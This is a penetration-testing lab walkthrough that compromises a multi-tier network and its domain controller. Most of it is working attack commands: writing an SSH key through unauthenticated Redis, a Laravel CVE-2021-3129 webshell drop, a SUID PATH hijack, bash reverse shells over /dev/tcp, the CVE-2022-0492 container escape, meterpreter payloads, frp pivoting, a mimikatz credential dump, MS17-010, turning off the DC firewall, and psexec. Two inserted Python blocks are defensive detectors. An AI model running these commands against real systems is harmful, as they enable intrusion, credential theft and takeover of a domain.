Information gathering
Host discovery with ARP
sudo arp-scan -l
Scan host 192.168.206.20 with nmap
sudo nmap -n -v -sS --min-rate 10000 -p- -Pn 192.168.206.20
Scan results
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 14:38 CST
Initiating ARP Ping Scan at 14:38
Scanning 192.168.206.20 [1 port]
Completed ARP Ping Scan at 14:38, 0.14s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:38
Scanning 192.168.206.20 [65535 ports]
Discovered open port 22/tcp on 192.168.206.20
Discovered open port 80/tcp on 192.168.206.20
Discovered open port 81/tcp on 192.168.206.20
Discovered open port 6379/tcp on 192.168.206.20
Completed SYN Stealth Scan at 14:38, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.206.20
Host is up (0.00018s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
6379/tcp open redis
MAC Address: 00:0C:29:24:CB:F0 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Browse to ports 80 and 81
Web penetration
Redis unauthenticated access
redis-cli -h 192.168.149.20
Try writing an SSH public key to log in
Generate the key pair
ssh-keygen -t rsa
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTxA54DkKtGgrD+PCEjNE7Z1m7BG5UZV02Lv2yaqf4oxEsY6SZLsLvFi7vtonWbBwjs/wzgsiUE07B+M0MUGBfikPikD8BVgd7/pDE5eYHtnoFB5TJSeRC7cfH8TDnZ9eFbxRB5iosKL8wOdX5fLFWhDmotKC47ZLnP5QacraMPc+AHC7N//swO9cs7WOXyFNATLUwcZePwnDja0DlWs1uxRBp9OHJcmUwG9Tb+v/RXBjx1Qo7ovwa7izI8cGM+YdSKrkBXMneP92cENo5oaJxnlXh5PhpfnAAIQ2Zzqz9nadLj8HrCCjnfhIOQBbvo5AjNy1+IhfWCi14AGijq3KGYIjF4MdIuFGF2axTxLra9XMxpiM+DakjHjYPkNPq9OYeS9IgSl8/spPx2B6hmsVkoBah51eJW9+ixytSwxH6QnNTs6eATaAc2VoYUppTC0XwUZos4WrM8LJ+uHN1yePnbts573yIM04u6CW0zSKhaIJjpCY+aHmD43BsUr8dyss= jojo@kali
Write the public key through Redis
config get dir
config get dbfilename
config set dir /root/.ssh/
config set dbfilename authorized_keys
set xz "\n\n\n ssh-rsa <id_rsa.pub key data> jojo@kali \n\n\n"
save
Log in to the host with the matching private key
ssh -i ~/.ssh/id_rsa root@192.168.149.20
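An added defender-side example, not part of the original write-up: a small Python detector that reads Redis MONITOR output and flags the CONFIG SET dir / dbfilename, SET and SAVE sequence used above to plant an authorized_keys file. The sample MONITOR lines are constructed to mirror that sequence, and the sensitive-path lists are assumptions to tune per deployment.

```python
import re
import shlex

# Dump locations and names that turn an open Redis into a file-write primitive (assumed list).
SENSITIVE_DIRS = ("/root/.ssh", "/home/", "/var/spool/cron", "/etc/cron", "/var/www")
SENSITIVE_FILES = ("authorized_keys", ".php", ".jsp")

# MONITOR line shape:  <timestamp> [<db> <ip:port>] "CMD" "arg1" "arg2" ...
MONITOR_LINE = re.compile(r'^(\d+\.\d+) \[(\d+) (?P<client>[^\]]+)\] (?P<cmd>.*)$')

def parse_monitor_line(line):
    """Return (client, [args]) for one MONITOR line, or None if it does not match."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    return m.group("client"), shlex.split(m.group("cmd"))

def detect_rdb_abuse(lines):
    """Flag, per client, the CONFIG SET / SET / SAVE sequence that plants a file via the RDB dump."""
    state, findings = {}, []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd, st = args[0].upper(), state.setdefault(client, {})
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key, value = args[2].lower(), args[3]
            if key in ("dir", "dbfilename"):
                st[key] = value            # remember where this client points the dump
                bad = value.startswith(SENSITIVE_DIRS) if key == "dir" else value.endswith(SENSITIVE_FILES)
                if bad:
                    findings.append((client, f"CONFIG SET {key} {value}"))
        elif cmd == "SET" and len(args) >= 3 and ("ssh-rsa" in args[2] or "<?php" in args[2]):
            findings.append((client, "SSH key or webshell text stored as a Redis value"))
        elif cmd in ("SAVE", "BGSAVE") and st.get("dir", "").startswith(SENSITIVE_DIRS):
            target = st["dir"].rstrip("/") + "/" + st.get("dbfilename", "dump.rdb")
            findings.append((client, f"{cmd} writes the dump to {target}"))
    return findings

# Constructed sample MONITOR output mirroring the sequence above (not a real capture).
SAMPLE_MONITOR = r"""
1684910000.100000 [0 192.168.149.49:51234] "CONFIG" "GET" "dir"
1684910000.200000 [0 192.168.149.49:51234] "CONFIG" "SET" "dir" "/root/.ssh/"
1684910000.300000 [0 192.168.149.49:51234] "CONFIG" "SET" "dbfilename" "authorized_keys"
1684910000.400000 [0 192.168.149.49:51234] "SET" "xz" "\n\n\n ssh-rsa AAAAB3Nza... jojo@kali \n\n\n"
1684910000.500000 [0 192.168.149.49:51234] "SAVE"
1684910001.000000 [0 10.0.0.5:40000] "SET" "session:42" "ok"
"""
```

Running `detect_rdb_abuse(SAMPLE_MONITOR.splitlines())` yields four findings, all from the one client; the session write from the second client is not flagged.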
Collect information on this host
IPs: 192.168.149.20, 192.168.52.10
cat /etc/nginx/conf.d/81.conf
The config reverse-proxies the service on 192.168.52.20:8000 to port 81 on this host; in other words, the service on local port 81 actually runs on 192.168.52.20.
CVE-2021-3129
The Laravel version is v8.29.0, which is affected by CVE-2021-3129. Verify with the public exploit, modifying the script so it writes a PHP one-line webshell:
GitHub - zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
system('echo PD9waHAgZXZhbCgiJF9QT1NUW2NtZF0iKTs/Pg==|base64 -d >/var/www/html/shell.php ');
After running it, request shell.php
python3 exp.py http://192.168.149.20:81/
shell.php is reachable
Connect with AntSword
It turns out to be a Docker container with no outbound network access, so the shell has to be bounced to 192.168.52.10 (ubuntu1) for further use.
cat /proc/1/cgroup
We are the low-privilege www-data user and escaping requires higher privileges, so escalate privileges first and escape afterwards.
find / -type f -perm -04000 -ls 2>/dev/null
List files with the SUID or SGID bit set
Found /home/jobs/shell; its source, demo.c:
#include <unistd.h>
#include <stdlib.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("ps");   // runs ps through the shell, so it is resolved via PATH
    return 0;
}
Reverse shell to ubuntu1
bash -c 'bash -i >& /dev/tcp/192.168.52.10/6677 0>&1'
Point the ps command at /tmp/ps so that running ps launches bash
echo '/bin/bash' > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH
echo $PATH
Run the shell binary to get root
Upload a script to check for Docker escape vulnerabilities; it reports four
git clone https://github.com/teamssix/container-escape-check.git
./container-escape-check.sh
CVE-2022-0492 container escape
Run as root inside the container:
unshare -UrmC bash
mkdir /tmp/testcgroup
mount -t cgroup -o memory cgroup /tmp/testcgroup
d=`dirname $(ls -x /tmp/testcgroup/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/192.168.52.10/7788 0>&1' > /exp.sh; chmod 777 /exp.sh
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$t/exp.sh" > $d/release_agent
sh -c "echo 0 >$d/w/cgroup.procs"
After running it, the shell comes back.
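An added defender-side check, not part of the original write-up: a Python assessment of whether a container is exposed to the cgroup release_agent technique used above, read from the CapEff and Seccomp fields of /proc/self/status and the cgroup mounts in /proc/mounts. The sample inputs are constructed; the function cannot see the host kernel's patch level or the AppArmor profile, which also gate this path.

```python
CAP_SYS_ADMIN = 21  # bit number from linux/capability.h

def parse_proc_status(text):
    """Turn /proc/<pid>/status text into a dict of field -> value."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields

def has_cap(cap_hex, bit):
    """True if the given capability bit is set in a CapEff/CapBnd hex mask."""
    return bool((int(cap_hex, 16) >> bit) & 1)

def cgroup_v1_rw_mounts(mounts_text):
    """Mount points of cgroup (v1) filesystems mounted read-write, parsed from /proc/mounts."""
    return [p[1] for p in (line.split() for line in mounts_text.splitlines())
            if len(p) >= 4 and p[2] == "cgroup" and "rw" in p[3].split(",")]

def assess_release_agent_exposure(status_text, mounts_text):
    """Classify how a root process in the container could reach a cgroup v1 release_agent file."""
    st = parse_proc_status(status_text)
    sys_admin = has_cap(st.get("CapEff", "0"), CAP_SYS_ADMIN)
    seccomp_on = st.get("Seccomp", "0") != "0"   # 0 = disabled, 2 = filter mode (Docker default)
    rw_mounts = cgroup_v1_rw_mounts(mounts_text)
    return {
        "cap_sys_admin": sys_admin,
        "seccomp_filter": seccomp_on,
        "rw_cgroup_mounts": rw_mounts,
        # Privileged-style container: release_agent is writable on an existing rw cgroup mount.
        "direct_release_agent_write": sys_admin and bool(rw_mounts),
        # CVE-2022-0492 path: without CAP_SYS_ADMIN, unshare(CLONE_NEWUSER) plus a fresh cgroup
        # mount obtains it inside a user namespace. Docker's default seccomp profile denies
        # unshare/mount, so this applies to unconfined containers on unpatched kernels.
        "userns_path_possible": (not sys_admin) and (not seccomp_on),
    }

# Constructed samples (not real captures): a default Docker container, one run with
# --privileged, and one run with --security-opt seccomp=unconfined.
DEFAULT_STATUS = "Name:\tbash\nSeccomp:\t2\nCapEff:\t00000000a80425fb\n"
PRIVILEGED_STATUS = "Name:\tbash\nSeccomp:\t0\nCapEff:\t0000003fffffffff\n"
UNCONFINED_STATUS = "Name:\tbash\nSeccomp:\t0\nCapEff:\t00000000a80425fb\n"
RO_MOUNTS = "cgroup /sys/fs/cgroup/memory cgroup ro,nosuid,nodev,noexec,relatime,memory 0 0\n"
RW_MOUNTS = "cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0\n"
```

On a live container, pass `open("/proc/self/status").read()` and `open("/proc/mounts").read()` instead of the samples.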
Intranet penetration
At this point two Linux hosts have been taken,
ubuntu1 and ubuntu2; to summarise:
ubuntu1 ip: 192.168.149.20, 192.168.52.10
ubuntu2 ip: 192.168.52.20, 192.168.93.10
Bring ubuntu1 online in msf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.149.49 LPORT=3344 -f elf -o reverse.elf
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.149.49; set lport 3344; exploit"
Add the route:
run post/multi/manage/autoroute
Bring ubuntu2 online in msf
msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=192.168.149.49 LPORT=4455 -f elf -o bind.elf
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/bind_tcp; set lhost 192.168.149.49; set lport 4455; exploit"
Upload frp to ubuntu2 and start a SOCKS proxy
Upload fscan to ubuntu2 and scan 192.168.52.0/24
start infoscan
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:80 open
192.168.52.10:81 open
192.168.52.20:8000 open
192.168.52.30:8080 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.30:8080 [通达OA]
[*] WebTitle: http://192.168.52.10 code:404 len:548 title:404 Not Found
[*] WebTitle: http://192.168.52.10:81 code:200 len:17474 title:Laravel
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474 title:Laravel
[+] InfoScan:http://192.168.52.10:81 [Laravel]
[+] InfoScan:http://192.168.52.20:8000 [Laravel]
[+] http://192.168.52.30:8080 tongda-user-session-disclosure
[+] http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129
[+] http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
Tongda OA is vulnerable
Connect with AntSword through the proxy; the shell runs as SYSTEM
Upload fscan and scan 192.168.93.0/24
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.20:1080 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.40:445 open
192.168.93.30:139 open
192.168.93.30:445 open
192.168.93.20:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.10:22 open
[+] 192.168.93.30 MS17-010 (Windows Server 2012 R2 Datacenter 9600)
[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统
[*] NetBios: 192.168.93.20 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] 192.168.93.20 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo: [*]192.168.93.30 [->]DC [->]192.168.93.30
[+] InfoScan:http://192.168.93.20:8080 [通达OA]
[*] NetBios: 192.168.93.30 [+]DC DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[+] 192.168.93.40 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] http://192.168.93.20:8080 tongda-user-session-disclosure
Information gathering on the pivot host
Dump credentials
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > res.txt
Domain controller: 192.168.93.30 DC.whoamianony.org
Domain: whoamianony.org
Live hosts:
192.168.93.10 ubuntu2
192.168.93.20 Windows 7 Professional 7601 Service Pack 1, ms17-010, pivot host
192.168.93.30 DC, Windows Server 2012 R2 Datacenter 9600
192.168.93.40 Windows 7 Professional 7601 Service Pack 1, ms17-010
Accounts: Administrator / Whoami2021, bunny / Bunny2021
Because the network has two layers, a second-hop proxy is needed
# frps.ini
[common]
bind_port = 7000

# frpc.ini
[common]
server_addr = 192.168.1.102
server_port = 7000

[socks5_forward]
type = tcp
local_ip = 192.168.52.10
local_port = 10808
remote_port = 6005

# frps.ini
[common]
bind_addr = 192.168.52.10
bind_port = 7000

# frpc.ini
[common]
server_addr = 192.168.52.10
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 10808
plugin = socks5
With the proxies in place, run msf through proxychains
Compromise 192.168.93.40 (ms17_010)
Compromise 192.168.93.20 (ms17_010)
Use sc to turn off the DC firewall
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall
Use psexec to get a shell on the DC, 192.168.93.30
use exploit/windows/smb/psexec
set payload windows/x64/shell_bind_tcp
set smbuser administrator
set smbpass Whoami2021
set rhost 192.168.93.30
run
Shells on all five target machines have now been obtained; the engagement is complete.